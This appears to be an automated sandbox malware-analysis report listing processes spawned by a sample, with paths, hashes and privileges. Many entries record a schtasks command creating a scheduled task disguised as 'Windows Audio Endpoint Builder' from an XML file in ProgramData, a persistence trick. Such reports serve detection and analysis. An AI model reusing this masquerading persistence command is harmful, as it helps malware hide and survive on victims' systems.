Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1616, Parent PID: 5852

General

Target ID:	78
Start time:	22:25:22
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	22:25:24
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6076, Parent PID: 7684

General

Target ID:	80
Start time:	22:25:24
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	22:25:24
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	22:25:29
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7944, Parent PID: 7972

General

Target ID:	83
Start time:	22:25:29
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	22:25:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5580, Parent PID: 2960

General

Target ID:	85
Start time:	22:25:30
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	22:25:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	22:25:34
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	22:25:34
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	22:25:37
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8164, Parent PID: 2676

General

Target ID:	90
Start time:	22:25:37
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	22:25:37
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	22:25:41
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2728, Parent PID: 5320

General

Target ID:	93
Start time:	22:25:41
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	22:25:43
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7288, Parent PID: 7224

General

Target ID:	95
Start time:	22:25:43
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	22:25:43
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	22:25:46
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7228, Parent PID: 7304

General

Target ID:	98
Start time:	22:25:46
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	22:25:52
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7268, Parent PID: 7280

General

Target ID:	100
Start time:	22:25:52
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	22:25:59
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4592, Parent PID: 1388

General

Target ID:	102
Start time:	22:25:59
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	22:25:59
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5048, Parent PID: 6868

General

Target ID:	104
Start time:	22:26:04
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	22:26:05
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 3944, Parent PID: 3220

General

Target ID:	106
Start time:	22:26:06
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	22:26:06
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	22:26:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	109
Start time:	22:26:13
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	22:26:13
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	22:26:16
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 1112, Parent PID: 3220

General

Target ID:	112
Start time:	22:26:19
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	22:26:19
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	22:26:21
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	115
Start time:	22:26:22
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 4416, Parent PID: 6072

General

Target ID:	116
Start time:	22:26:27
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	117
Start time:	22:26:28
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2420, Parent PID: 3664

General

Target ID:	118
Start time:	22:26:28
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	22:26:34
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 5836, Parent PID: 3220

General

Target ID:	120
Start time:	22:26:38
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7832, Parent PID: 5836

General

Target ID:	121
Start time:	22:26:38
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	22:26:46
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	123
Start time:	22:26:47
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 7808, Parent PID: 3220

General

Target ID:	124
Start time:	22:26:47
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	125
Start time:	22:26:47
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	126
Start time:	22:26:52
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	127
Start time:	22:26:57
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	128
Start time:	22:26:57
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	129
Start time:	22:26:58
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7680, Parent PID: 7884

General

Target ID:	130
Start time:	22:27:08
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	131
Start time:	22:27:03
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	132
Start time:	22:27:04
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 7940, Parent PID: 3220

General

Target ID:	133
Start time:	22:27:06
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	134
Start time:	22:27:06
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	135
Start time:	22:27:15
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	136
Start time:	22:27:15
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
